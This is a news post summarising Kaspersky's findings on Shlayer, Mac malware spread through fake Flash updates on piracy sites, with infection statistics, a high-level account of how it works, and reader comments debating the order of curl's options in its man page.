Mac users are getting bombarded by laughably unsophisticated malware:
Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it's the number one threat encountered by users of Kaspersky Labs' antivirus programs for macOS.
Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by the Kaspersky Lab's Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific.
An analysis Kaspersky Lab published on Thursday says that Shlayer is "a rather ordinary piece of malware" that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remote traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday's post said "is basically the calling card of the entire family."
Another banal detail about Shlayer is its previously mentioned infected method. It's seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.
(Score: 2) by Mojibake Tengu on Saturday January 25 2020, @09:27AM (3 children)
Options f,0,L are in natural order as they appear in curl manpage. Anyone who needs logically use those options could write -f0L .
Respect Authorities. Know your social status. Woke responsibly.
(Score: 2) by maxwell demon on Sunday January 26 2020, @08:05AM (2 children)
I just checked, and on my system -0 is described before -f in the man page. Which makes sense because generally digits are sorted before letters.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 2) by Mojibake Tengu on Sunday January 26 2020, @09:20AM (1 child)
curl 7.67 on BSD.
I already checked the option order in the man page before my post. Even in --help listing, 0 is placed between h and i.
Are you sure you don't have some backdoored curl by other provisioning?
Respect Authorities. Know your social status. Woke responsibly.
(Score: 2) by maxwell demon on Wednesday January 29 2020, @01:31PM
Just tried --help, and there it is indeed between h and i. There it seems to be sorted by long option name.
Maybe the man pages on Linux and BSD are written by different people?
I'm pretty sure my curl is authentic as it is straight from the repositories.
With a web search, I even found a version of the man page where the digit options are listed last. [die.net]
And here is an online version with -0 coming early. [oracle.com]
The Tao of math: The numbers you can count are not the real numbers.